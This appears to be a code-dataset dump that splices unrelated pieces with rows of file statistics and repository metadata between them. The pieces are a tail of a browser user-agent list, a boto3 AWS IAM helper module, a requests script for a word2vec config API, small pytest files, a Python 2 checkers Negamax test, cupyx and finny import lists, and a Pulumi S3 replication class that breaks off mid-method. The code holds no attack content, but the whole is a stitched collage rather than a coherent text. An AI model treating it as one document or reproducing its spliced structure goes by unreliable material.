AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET CLR 1.1.4322; .NET4.0C; Tablet PC 2.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Opera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00', 'Mozilla/5.0 (X11; Linux i586; rv:63.0) Gecko/20100101 Firefox/63.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)']
| 1,451.913043
| 33,091
| 0.71974
| 6,726
| 33,394
| 3.555456
| 0.03479
| 0.092833
| 0.111023
| 0.199883
| 0.963536
| 0.958978
| 0.955716
| 0.949611
| 0.9466
| 0.944091
| 0
| 0.245578
| 0.102773
| 33,394
| 22
| 33,092
| 1,517.909091
| 0.552567
| 0.007786
| 0
| 0
| 0
| 300
| 0.962734
| 0.00761
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
6bc1b3e741bae2dce0d3ef56db36cfde2106cd53
| 181
|
py
|
Python
|
src/xapitrader/core/api/__init__.py
|
SarithT/xapitrader
|
0018bc37d9756a10c328def90d042ef39857cfb5
|
[
"MIT"
] | null | null | null |
src/xapitrader/core/api/__init__.py
|
SarithT/xapitrader
|
0018bc37d9756a10c328def90d042ef39857cfb5
|
[
"MIT"
] | null | null | null |
src/xapitrader/core/api/__init__.py
|
SarithT/xapitrader
|
0018bc37d9756a10c328def90d042ef39857cfb5
|
[
"MIT"
] | null | null | null |
from xapitrader.core.api.APIConnector import APIConnector
from xapitrader.core.api.APIStreamConnector import APIStreamConnector
from xapitrader.core.api.JsonSocket import JsonSocket
| 60.333333
| 69
| 0.889503
| 21
| 181
| 7.666667
| 0.380952
| 0.26087
| 0.335404
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060773
| 181
| 3
| 70
| 60.333333
| 0.947059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d424f4f5eec4d84d66604e145429f8704a71f94f
| 6,854
|
py
|
Python
|
ep3/iam_example.py
|
rahulwinx1985/python-for-cloud
|
6a311998fbf3712cc682b335730aea83062406ab
|
[
"MIT"
] | 3
|
2021-11-18T15:43:39.000Z
|
2022-01-23T14:09:57.000Z
|
ep3/iam_example.py
|
rahulwinx1985/python-for-cloud
|
6a311998fbf3712cc682b335730aea83062406ab
|
[
"MIT"
] | null | null | null |
ep3/iam_example.py
|
rahulwinx1985/python-for-cloud
|
6a311998fbf3712cc682b335730aea83062406ab
|
[
"MIT"
] | 27
|
2021-11-10T08:44:10.000Z
|
2022-03-30T08:19:46.000Z
|
import json
import boto3
from botocore.exceptions import ClientError
# Create IAM User
def create_iam_user(user_name):
try:
iam_client = boto3.client('iam')
response = iam_client.create_user(UserName=user_name)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
return False
else:
print("Unexpected error: %s" % e)
return False
return response
# responseObject = create_iam_user("SandipSimpleTest1")
# print(responseObject)
def list_iam_users():
try:
iam_client = boto3.client('iam')
paginator = iam_client.get_paginator('list_users')
for response in paginator.paginate():
#print(response["Users"])
for user in response["Users"]:
print("User name: ",user["UserName"])
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# list_iam_users()
def update_iam_user(existing_user_name, new_user_name):
try:
iam_client = boto3.client('iam')
iam_client.update_user(UserName=existing_user_name,
NewUserName=new_user_name)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# update_iam_user("SandipTest1", "SandipTest1Renamed")
# list_iam_users()
def delete_iam_user(existing_user_name):
try:
iam_client = boto3.client('iam')
iam_client.delete_user(UserName=existing_user_name)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# delete_iam_user("SandipTest1Renamed")
# list_iam_users()
def create_iam_policy(policy_name, policy_json):
try:
iam_client = boto3.client('iam')
iam_client.create_policy(
PolicyName=policy_name,
PolicyDocument=json.dumps(policy_json)
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
return False
else:
print("Unexpected error: %s" % e)
return False
return True
custom_policy_json = {
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"ec2:*"
],
"Resource": "*"
}]
}
#create_iam_policy("test_policy_1_by_sandip", custom_policy_json)
def attach_custom_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
account_id = sts.get_caller_identity()['Account']
policy_arn = f'arn:aws:iam::{account_id}:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.attach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# create_iam_user("sandip_poilcy_test_user_1")
# attach_custom_iam_policy_with_user("test_policy_1_by_sandip", "sandip_poilcy_test_user_1")
def attach_managed_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
policy_arn = f'arn:aws:iam::aws:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.attach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
# attach_managed_iam_policy_with_user("AdministratorAccess", "sandip_poilcy_test_user_1")
def detach_custom_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
account_id = sts.get_caller_identity()['Account']
policy_arn = f'arn:aws:iam::{account_id}:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.detach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
#detach_custom_iam_policy_with_user("test_policy_1_by_sandip","sandip_poilcy_test_user_1")
def detach_managed_iam_policy_with_user(policy_name, user_name):
try:
sts = boto3.client('sts')
policy_arn = f'arn:aws:iam::aws:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.detach_user_policy(
UserName=user_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
#detach_managed_iam_policy_with_user("AdministratorAccess", "sandip_poilcy_test_user_1")
def add_policy_to_role(role_name, policy_arn):
try:
iam_client = boto3.client('iam')
iam_client.attach_role_policy(
RoleName=role_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
def attach_custom_iam_policy_with_role(policy_name, role_name):
try:
sts = boto3.client('sts')
account_id = sts.get_caller_identity()['Account']
policy_arn = f'arn:aws:iam::{account_id}:policy/{policy_name}'
iam_client = boto3.client('iam')
iam_client.attach_role_policy(
RoleName=role_name,
PolicyArn=policy_arn
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
def create_role(role_name, trust_document):
try:
iam_client = boto3.client('iam')
iam_client.create_role(
RoleName=role_name,
AssumeRolePolicyDocument=json.dumps(trust_document)
)
except ClientError as e:
if e.response['Error']['Code'] == 'EntityAlreadyExists':
print("Object already exists")
else:
print("Unexpected error: %s" % e)
| 33.763547
| 92
| 0.620514
| 792
| 6,854
| 5.089646
| 0.113636
| 0.053585
| 0.041677
| 0.059539
| 0.803027
| 0.755396
| 0.736046
| 0.733069
| 0.72389
| 0.703548
| 0
| 0.007741
| 0.264955
| 6,854
| 203
| 93
| 33.763547
| 0.792378
| 0.105194
| 0
| 0.714286
| 0
| 0
| 0.196633
| 0.034652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.017857
| 0
| 0.125
| 0.14881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d45f6fe3eee5025cf0c403b9a4cab0d0aae39ac9
| 1,237
|
py
|
Python
|
skp_edu_docker/code/demo/api_basic_7_netconf_w2v.py
|
TensorMSA/hoyai_docker
|
12f0041e6306d8a6421585a4b51666bad30be442
|
[
"MIT"
] | 8
|
2017-06-16T00:19:12.000Z
|
2020-08-13T03:15:57.000Z
|
skp_edu_docker/code/demo/api_basic_7_netconf_w2v.py
|
TensorMSA/tensormsa_docker
|
12f0041e6306d8a6421585a4b51666bad30be442
|
[
"MIT"
] | 21
|
2017-06-09T10:15:14.000Z
|
2018-03-29T07:51:02.000Z
|
skp_edu_docker/code/demo/api_basic_7_netconf_w2v.py
|
TensorMSA/hoyai_docker
|
12f0041e6306d8a6421585a4b51666bad30be442
|
[
"MIT"
] | 4
|
2017-10-25T09:59:53.000Z
|
2020-05-07T09:51:11.000Z
|
import requests
import json, os
url = "{0}:{1}".format(os.environ['HOSTNAME'] , "8000")
nn_id = "nn00002"
wf_ver_id = "1"
# update source_info
# set netconf_node in NN_WF_NODE_INFO
resp = requests.put('http://' + url + '/api/v1/type/wf/state/netconf/detail/w2v/nnid/' + nn_id + '/ver/' + wf_ver_id + '/node/netconf_node/',
json={
"window_size" : 5,
"vector_size" : 100,
"batch_size" : 100,
"iter" : 5,
"min_count" : 0
})
data = json.loads(resp.json())
print("evaluation result : {0}".format(data))
nn_id = "nn00009"
wf_ver_id = "1"
# update source_info
# set netconf_node in NN_WF_NODE_INFO
resp = requests.put('http://' + url + '/api/v1/type/wf/state/netconf/detail/w2v/nnid/' + nn_id + '/ver/' + wf_ver_id + '/node/netconf_node/',
json={
"window_size" : 5,
"vector_size" : 300,
"batch_size" : 100,
"iter" : 5,
"min_count" : 0
})
data = json.loads(resp.json())
print("evaluation result : {0}".format(data))
| 33.432432
| 141
| 0.488278
| 147
| 1,237
| 3.891156
| 0.333333
| 0.027972
| 0.048951
| 0.027972
| 0.84965
| 0.84965
| 0.84965
| 0.84965
| 0.84965
| 0.84965
| 0
| 0.05303
| 0.359741
| 1,237
| 37
| 142
| 33.432432
| 0.669192
| 0.088116
| 0
| 0.740741
| 0
| 0
| 0.289146
| 0.081851
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d45f94ab19264256f7790828665c9a07ec75a8a3
| 171
|
py
|
Python
|
tests/test_gatherup.py
|
nmstoker/gatherup
|
38f3a78079c29fc61be30ee88c44755edbe5c784
|
[
"MIT"
] | 9
|
2020-08-06T00:55:08.000Z
|
2022-01-05T06:33:58.000Z
|
tests/test_gatherup.py
|
domcross/gatherup
|
d06d5f3c06b5cb21de66ec2fe256b5efd588a76f
|
[
"MIT"
] | 4
|
2020-08-06T00:29:11.000Z
|
2020-10-10T20:01:53.000Z
|
tests/test_gatherup.py
|
domcross/gatherup
|
d06d5f3c06b5cb21de66ec2fe256b5efd588a76f
|
[
"MIT"
] | 1
|
2020-10-04T17:20:28.000Z
|
2020-10-04T17:20:28.000Z
|
from gatherup import *
def test_indent_text_no_indent_specified():
assert indent_text('indent this text') == ' indent this text'
# ADD SOME MEANINGFUL TESTS HERE!!!
| 24.428571
| 65
| 0.748538
| 24
| 171
| 5.083333
| 0.666667
| 0.163934
| 0.229508
| 0.295082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 171
| 6
| 66
| 28.5
| 0.847222
| 0.192982
| 0
| 0
| 0
| 0
| 0.264706
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d47a81a9cbdca02c61be92d0489a361c9f4a7135
| 397
|
py
|
Python
|
tests/internal/free_tier_eligible/test_free_tier_eligible_false_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/free_tier_eligible/test_free_tier_eligible_false_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/free_tier_eligible/test_free_tier_eligible_false_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module free_tier_eligible.false
import pytest
import ec2_compare.internal.free_tier_eligible.false
def test_get_internal_data_free_tier_eligible_false_get_instances_list():
assert len(ec2_compare.internal.free_tier_eligible.false.get_instances_list()) > 0
def test_get_internal_data_free_tier_eligible_false_get():
assert len(ec2_compare.internal.free_tier_eligible.false.get) > 0
| 39.7
| 84
| 0.866499
| 62
| 397
| 5.048387
| 0.322581
| 0.153355
| 0.306709
| 0.402556
| 0.827476
| 0.827476
| 0.827476
| 0.619808
| 0.619808
| 0.619808
| 0
| 0.013477
| 0.065491
| 397
| 9
| 85
| 44.111111
| 0.830189
| 0.098237
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
00f92333fb9ec9168a30330e2c29fc1a24de5076
| 1,932
|
py
|
Python
|
test/T_Negamax.py
|
jrinder42/Checkers-AI
|
63f409c19b52d7e17268b21abab5cfed15ca0642
|
[
"MIT"
] | null | null | null |
test/T_Negamax.py
|
jrinder42/Checkers-AI
|
63f409c19b52d7e17268b21abab5cfed15ca0642
|
[
"MIT"
] | null | null | null |
test/T_Negamax.py
|
jrinder42/Checkers-AI
|
63f409c19b52d7e17268b21abab5cfed15ca0642
|
[
"MIT"
] | null | null | null |
# Testing Negamax Algorithm
from Negamax import Negamax, Negamax_AB
def test():
'currently no error checking for valid user moves'
N = Negamax()
board = N.init_board()
player = True
while not N.game_over(board):
if player: # black - AI
print N.generate_black_moves(board)
N.negamax(board, 2, 1) # -N.negamax(board, 2, -1)
#N.negamax(board, 3, float('-inf'), float('inf'), 1)
move = N.BEST_MOVE
board = N.move_black(board, *move)
N.print_board(board)
player = False
else:
print N.generate_white_moves(board)
i = int(raw_input("Enter piece i: "))
j = int(raw_input("Enter piece j: "))
i_new = int(raw_input("Enter new i: "))
j_new = int(raw_input("Enter new j: "))
board = N.move_white(board, (i, j), (i_new, j_new))
N.print_board(board)
player = True
def test_ab():
'currently no error checking for valid user moves'
N = Negamax_AB()
board = N.init_board()
player = True
while not N.game_over(board):
if player: # black - AI
print N.generate_black_moves(board)
#N.negamax(board, 2, 1) # -N.negamax(board, 2, -1)
N.negamax(board, 3, float('-inf'), float('inf'), 1)
move = N.BEST_MOVE
board = N.move_black(board, *move)
N.print_board(board)
player = False
else:
print N.generate_white_moves(board)
i = int(raw_input("Enter piece i: "))
j = int(raw_input("Enter piece j: "))
i_new = int(raw_input("Enter new i: "))
j_new = int(raw_input("Enter new j: "))
board = N.move_white(board, (i, j), (i_new, j_new))
N.print_board(board)
player = True
if __name__ == '__main__':
test()
# test_ab
| 31.16129
| 64
| 0.538302
| 263
| 1,932
| 3.764259
| 0.190114
| 0.064646
| 0.088889
| 0.129293
| 0.905051
| 0.905051
| 0.905051
| 0.905051
| 0.905051
| 0.905051
| 0
| 0.009346
| 0.335404
| 1,932
| 62
| 65
| 31.16129
| 0.761682
| 0.09265
| 0
| 0.808511
| 0
| 0
| 0.127794
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021277
| null | null | 0.170213
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2e4406d2935597e25c906d158e1d8ccd2a945e93
| 1,227
|
py
|
Python
|
cupyx/scipy/special/__init__.py
|
prkhrsrvstv1/cupy
|
ea86c8225b575af9d2855fb77a306cf86fd098ea
|
[
"MIT"
] | 6,180
|
2016-11-01T14:22:30.000Z
|
2022-03-31T08:39:20.000Z
|
cupyx/scipy/special/__init__.py
|
prkhrsrvstv1/cupy
|
ea86c8225b575af9d2855fb77a306cf86fd098ea
|
[
"MIT"
] | 6,281
|
2016-12-22T07:42:31.000Z
|
2022-03-31T19:57:02.000Z
|
cupyx/scipy/special/__init__.py
|
prkhrsrvstv1/cupy
|
ea86c8225b575af9d2855fb77a306cf86fd098ea
|
[
"MIT"
] | 829
|
2017-02-23T05:46:12.000Z
|
2022-03-27T17:40:03.000Z
|
from cupyx.scipy.special._bessel import i0 # NOQA
from cupyx.scipy.special._bessel import i1 # NOQA
from cupyx.scipy.special._bessel import j0 # NOQA
from cupyx.scipy.special._bessel import j1 # NOQA
from cupyx.scipy.special._bessel import y0 # NOQA
from cupyx.scipy.special._bessel import y1 # NOQA
from cupyx.scipy.special._polygamma import polygamma # NOQA
from cupyx.scipy.special._digamma import digamma # NOQA
from cupyx.scipy.special._gamma import gamma # NOQA
from cupyx.scipy.special._gammaln import gammaln # NOQA
from cupyx.scipy.special._zeta import zeta # NOQA
from cupyx.scipy.special._statistics import ndtr # NOQA
from cupyx.scipy.special._erf import erf # NOQA
from cupyx.scipy.special._erf import erfc # NOQA
from cupyx.scipy.special._erf import erfcx # NOQA
from cupyx.scipy.special._erf import erfinv # NOQA
from cupyx.scipy.special._erf import erfcinv # NOQA
from cupyx.scipy.special._convex_analysis import entr # NOQA
from cupyx.scipy.special._convex_analysis import huber # NOQA
from cupyx.scipy.special._convex_analysis import kl_div # NOQA
from cupyx.scipy.special._convex_analysis import pseudo_huber # NOQA
from cupyx.scipy.special._convex_analysis import rel_entr # NOQA
| 43.821429
| 69
| 0.798696
| 184
| 1,227
| 5.163043
| 0.179348
| 0.208421
| 0.324211
| 0.486316
| 0.813684
| 0.655789
| 0.621053
| 0.247368
| 0.105263
| 0
| 0
| 0.005618
| 0.129584
| 1,227
| 27
| 70
| 45.444444
| 0.883895
| 0.088835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2e83e5a2917d3edb55bb4fad2f172f89b90c7faa
| 117
|
py
|
Python
|
finny/views/__init__.py
|
hurrycane/finny
|
aff6e1c480426976cfee02b3c1d3e6ae9c196f81
|
[
"MIT"
] | null | null | null |
finny/views/__init__.py
|
hurrycane/finny
|
aff6e1c480426976cfee02b3c1d3e6ae9c196f81
|
[
"MIT"
] | null | null | null |
finny/views/__init__.py
|
hurrycane/finny
|
aff6e1c480426976cfee02b3c1d3e6ae9c196f81
|
[
"MIT"
] | null | null | null |
from .restful_view import ResourceBuilder
from .restful_view import Resource
from .restful_view import ModelResource
| 29.25
| 41
| 0.871795
| 15
| 117
| 6.6
| 0.466667
| 0.333333
| 0.454545
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 117
| 3
| 42
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
cf87c53a2a22f53e7de815e9542aee10e7c7812d
| 23,152
|
py
|
Python
|
sdk/python/pulumi_aws/s3/bucket_replication_config.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_replication_config.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/s3/bucket_replication_config.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BucketReplicationConfigArgs', 'BucketReplicationConfig']
@pulumi.input_type
class BucketReplicationConfigArgs:
def __init__(__self__, *,
bucket: pulumi.Input[str],
role: pulumi.Input[str],
rules: pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]]):
"""
The set of arguments for constructing a BucketReplicationConfig resource.
:param pulumi.Input[str] bucket: The name of the source S3 bucket you want Amazon S3 to monitor.
:param pulumi.Input[str] role: The ARN of the IAM role for Amazon S3 to assume when replicating the objects.
:param pulumi.Input[Sequence[pulumi.Input['BucketReplicationConfigRuleArgs']]] rules: Set of configuration blocks describing the rules managing the replication documented below.
"""
pulumi.set(__self__, "bucket", bucket)
